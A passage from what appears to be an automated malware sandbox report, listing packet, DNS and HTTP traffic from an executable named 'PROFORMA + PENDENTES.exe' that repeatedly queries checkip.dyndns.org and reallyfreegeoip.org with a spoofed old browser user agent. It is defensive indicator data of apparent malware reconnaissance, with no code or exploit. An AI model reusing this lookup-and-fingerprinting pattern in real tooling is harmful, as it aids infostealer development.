                                            Nov 18, 2024 18:18:50.644663095 CET44349719188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:50.646449089 CET49719443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:50.651505947 CET49719443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:50.651521921 CET44349719188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:50.657521963 CET4971780192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:50.657566071 CET8049718158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:50.662024975 CET49720443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:50.662065983 CET44349720188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:50.662164927 CET49720443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:50.662414074 CET49720443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:50.662425041 CET44349720188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:50.703808069 CET4971880192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:51.310565948 CET44349719188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:51.310659885 CET49719443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:51.312271118 CET49719443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:51.312314987 CET44349719188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:51.312601089 CET44349719188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:51.329226971 CET44349720188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:51.330740929 CET49720443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:51.330760002 CET44349720188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:51.360059023 CET49719443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:51.367959023 CET49719443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:51.411375999 CET44349719188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:51.501487017 CET44349720188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:51.501554012 CET44349720188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:51.501830101 CET49720443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:51.502185106 CET49720443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:51.506640911 CET4971880192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:51.507735968 CET4972180192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:51.512023926 CET8049718158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:51.512073994 CET4971880192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:51.512803078 CET8049721158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:51.512886047 CET4972180192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:51.513005972 CET4972180192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:51.517920017 CET8049721158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:51.541337013 CET44349719188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:51.541404009 CET44349719188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:51.541579962 CET49719443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:51.543908119 CET49719443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:51.547415018 CET4971780192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:51.552496910 CET8049717158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:51.694720030 CET8049717158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:51.697295904 CET49722443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:51.697323084 CET44349722188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:51.697439909 CET49722443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:51.697799921 CET49722443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:51.697824955 CET44349722188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:51.735168934 CET4971780192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:52.162961006 CET8049721158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:52.164582968 CET49723443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:52.164627075 CET44349723188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:52.164711952 CET49723443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:52.164999962 CET49723443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:52.165014982 CET44349723188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:52.203804970 CET4972180192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:52.354984045 CET44349722188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:52.356821060 CET49722443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:52.356851101 CET44349722188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:52.714118004 CET44349722188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:52.714181900 CET44349722188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:52.714540005 CET49722443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:52.714865923 CET49722443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:52.719288111 CET4971780192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:52.720927954 CET4972480192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:52.724606991 CET8049717158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:52.725900888 CET8049724158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:52.726002932 CET4971780192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:52.726066113 CET4972480192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:52.726176977 CET4972480192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:52.731128931 CET8049724158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:52.807228088 CET44349723188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:52.809447050 CET49723443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:52.809470892 CET44349723188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:52.964313030 CET44349723188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:52.964394093 CET44349723188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:52.964972019 CET49723443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:52.964972019 CET49723443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:52.984128952 CET4972180192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:52.985241890 CET4972580192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:52.989548922 CET8049721158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:52.990199089 CET8049725158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:52.990298986 CET4972180192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:52.990326881 CET4972580192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:52.990466118 CET4972580192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:52.995428085 CET8049725158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:53.412066936 CET8049724158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:53.413994074 CET49727443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:53.414037943 CET44349727188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:53.414228916 CET49727443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:53.414514065 CET49727443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:53.414525986 CET44349727188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:53.453795910 CET4972480192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:53.654767036 CET8049725158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:53.658257008 CET49729443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:53.658307076 CET44349729188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:53.660260916 CET49729443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:53.660686970 CET49729443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:53.660696983 CET44349729188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:53.703927994 CET4972580192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:54.032872915 CET44349727188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:54.034554005 CET49727443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:54.034573078 CET44349727188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:54.183913946 CET44349727188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:54.183994055 CET44349727188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:54.184041023 CET49727443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:54.184554100 CET49727443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:54.187982082 CET4972480192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:54.189368963 CET4973180192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:54.193252087 CET8049724158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:54.193308115 CET4972480192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:54.194346905 CET8049731158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:54.194422007 CET4973180192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:54.194538116 CET4973180192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:54.199471951 CET8049731158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:54.313200951 CET44349729188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:54.315257072 CET49729443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:54.315289974 CET44349729188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:54.487478971 CET44349729188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:54.487571001 CET44349729188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:54.487653971 CET49729443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:54.488097906 CET49729443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:54.492182970 CET4972580192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:54.493093014 CET4973280192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:54.498112917 CET8049732158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:54.498178959 CET4973280192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:54.498285055 CET4973280192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:54.501349926 CET8049725158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:54.501429081 CET4972580192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:54.503206968 CET8049732158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:54.843444109 CET8049731158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:54.844803095 CET49734443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:54.844827890 CET44349734188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:54.844890118 CET49734443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:54.845489025 CET49734443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:54.845499992 CET44349734188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:54.891309023 CET4973180192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:55.139745951 CET8049732158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:55.141549110 CET49735443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:55.141611099 CET44349735188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:55.141993999 CET49735443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:55.141994953 CET49735443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:55.142030001 CET44349735188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:55.190673113 CET4973280192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:55.520224094 CET44349734188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:55.560265064 CET49734443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:55.560300112 CET44349734188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:55.713298082 CET44349734188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:55.713377953 CET44349734188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:55.713438034 CET49734443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:55.713890076 CET49734443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:55.720604897 CET4973680192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:55.726142883 CET8049736158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:55.730412006 CET4973680192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:55.732147932 CET4973680192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:55.736977100 CET8049736158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:55.810237885 CET44349735188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:55.819032907 CET49735443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:55.819058895 CET44349735188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:56.968770027 CET44349735188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:56.968852997 CET44349735188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:56.969085932 CET8049736158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:56.969280958 CET49735443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:56.969280958 CET49735443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:56.969322920 CET8049736158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:56.969440937 CET4973680192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:56.969469070 CET8049736158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:56.969552040 CET4973680192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:56.971194983 CET49737443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:56.971234083 CET44349737188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:56.971410990 CET49737443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:56.971798897 CET49737443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:56.971810102 CET44349737188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:57.677867889 CET44349737188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:57.713079929 CET49737443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:57.713105917 CET44349737188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:57.853862047 CET4973280192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:57.853892088 CET4971380192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:57.885195017 CET44349737188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:57.885276079 CET44349737188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:57.885327101 CET49737443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:57.886758089 CET49737443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:57.940993071 CET4973680192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:57.946355104 CET8049736158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:57.946409941 CET4973680192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:57.946719885 CET4973880192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:57.951538086 CET8049738158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:57.951617956 CET4973880192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:57.955004930 CET4973880192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:57.959901094 CET8049738158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:58.976974010 CET8049738158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:58.978579998 CET49739443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:58.978615999 CET44349739188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:58.978888988 CET49739443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:58.979180098 CET49739443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:58.979193926 CET44349739188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:59.031991959 CET4973880192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:59.646847010 CET44349739188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:59.649959087 CET49739443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:59.649995089 CET44349739188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:59.810256004 CET44349739188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:59.810415030 CET44349739188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:18:59.810472965 CET49739443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:59.811013937 CET49739443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:18:59.822761059 CET4974080192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:59.822868109 CET4973880192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:59.827792883 CET8049740158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:59.827910900 CET4974080192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:59.828233004 CET8049738158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:18:59.828310013 CET4973880192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:59.830641985 CET4974080192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:18:59.835668087 CET8049740158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:19:00.469577074 CET8049740158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:19:00.485270023 CET49741443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:19:00.485323906 CET44349741188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:19:00.485394001 CET49741443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:19:00.485915899 CET49741443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:19:00.485928059 CET44349741188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:19:00.516302109 CET4974080192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:19:01.142963886 CET44349741188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:19:01.145138979 CET49741443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:19:01.145174026 CET44349741188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:19:01.307156086 CET44349741188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:19:01.307219028 CET44349741188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:19:01.307326078 CET49741443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:19:01.307852030 CET49741443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:19:01.311011076 CET4974080192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:19:01.312194109 CET4974280192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:19:01.316521883 CET8049740158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:19:01.316617012 CET4974080192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:19:01.317114115 CET8049742158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:19:01.317202091 CET4974280192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:19:01.317320108 CET4974280192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:19:01.322105885 CET8049742158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:19:02.925770998 CET8049742158.101.44.242192.168.2.8
                                            Nov 18, 2024 18:19:02.969506025 CET4974280192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:19:03.131202936 CET49743443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:19:03.131369114 CET44349743188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:19:03.131480932 CET49743443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:19:03.132276058 CET49743443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:19:03.132308960 CET44349743188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:19:03.805622101 CET44349743188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:19:03.807359934 CET49743443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:19:03.807439089 CET44349743188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:19:03.984713078 CET44349743188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:19:03.984889984 CET44349743188.114.97.3192.168.2.8
                                            Nov 18, 2024 18:19:03.984972000 CET49743443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:19:03.985737085 CET49743443192.168.2.8188.114.97.3
                                            Nov 18, 2024 18:19:04.130192995 CET4973180192.168.2.8158.101.44.242
                                            Nov 18, 2024 18:19:04.130342960 CET4974280192.168.2.8158.101.44.242
                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 18, 2024 18:18:43.790225983 CET5185853192.168.2.81.1.1.1
                                            Nov 18, 2024 18:18:43.799127102 CET53518581.1.1.1192.168.2.8
                                            Nov 18, 2024 18:18:44.697206020 CET6446553192.168.2.81.1.1.1
                                            Nov 18, 2024 18:18:44.704750061 CET53644651.1.1.1192.168.2.8
                                            Nov 18, 2024 18:19:08.727518082 CET5361960162.159.36.2192.168.2.8
                                            Nov 18, 2024 18:19:09.400460005 CET5362453192.168.2.81.1.1.1
                                            Nov 18, 2024 18:19:09.408044100 CET53536241.1.1.1192.168.2.8
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Nov 18, 2024 18:18:43.790225983 CET192.168.2.81.1.1.10xb9e8Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                            Nov 18, 2024 18:18:44.697206020 CET192.168.2.81.1.1.10x1deeStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                            Nov 18, 2024 18:19:09.400460005 CET192.168.2.81.1.1.10x5149Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Nov 18, 2024 18:18:43.799127102 CET1.1.1.1192.168.2.80xb9e8No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                            Nov 18, 2024 18:18:43.799127102 CET1.1.1.1192.168.2.80xb9e8No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                            Nov 18, 2024 18:18:43.799127102 CET1.1.1.1192.168.2.80xb9e8No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                            Nov 18, 2024 18:18:43.799127102 CET1.1.1.1192.168.2.80xb9e8No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                            Nov 18, 2024 18:18:43.799127102 CET1.1.1.1192.168.2.80xb9e8No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                            Nov 18, 2024 18:18:43.799127102 CET1.1.1.1192.168.2.80xb9e8No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                            Nov 18, 2024 18:18:44.704750061 CET1.1.1.1192.168.2.80x1deeNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                            Nov 18, 2024 18:18:44.704750061 CET1.1.1.1192.168.2.80x1deeNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                            Nov 18, 2024 18:19:09.408044100 CET1.1.1.1192.168.2.80x5149Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                            • reallyfreegeoip.org
                                            • checkip.dyndns.org
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.849709158.101.44.242803636C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 18, 2024 18:18:43.820655107 CET151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
                                            Nov 18, 2024 18:18:44.475091934 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:44 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 59635b504faa5f32bbef4d9f4c043bd8
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                            Nov 18, 2024 18:18:44.486680031 CET127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Nov 18, 2024 18:18:44.635963917 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:44 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: c510cbce5be038d340430abf137ab5cb
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                            Nov 18, 2024 18:18:46.025723934 CET127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Nov 18, 2024 18:18:46.175990105 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:46 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: c5c95bdf61da83897f19b8067fc834d5
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.849713158.101.44.242803636C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 18, 2024 18:18:47.011665106 CET127OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Nov 18, 2024 18:18:47.658689976 CET323INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 17:18:47 GMT
                                            Content-Type: text/html
                                            Content-Length: 106
                                            Connection: keep-alive
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            X-Request-ID: 88008307a45299c653fecfd2118f6486
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.849715158.101.44.242803636C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 18, 2024 18:18:48.522344112 CET151OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                            Host: checkip.dyndns.org
                                            Connection: Keep-Alive
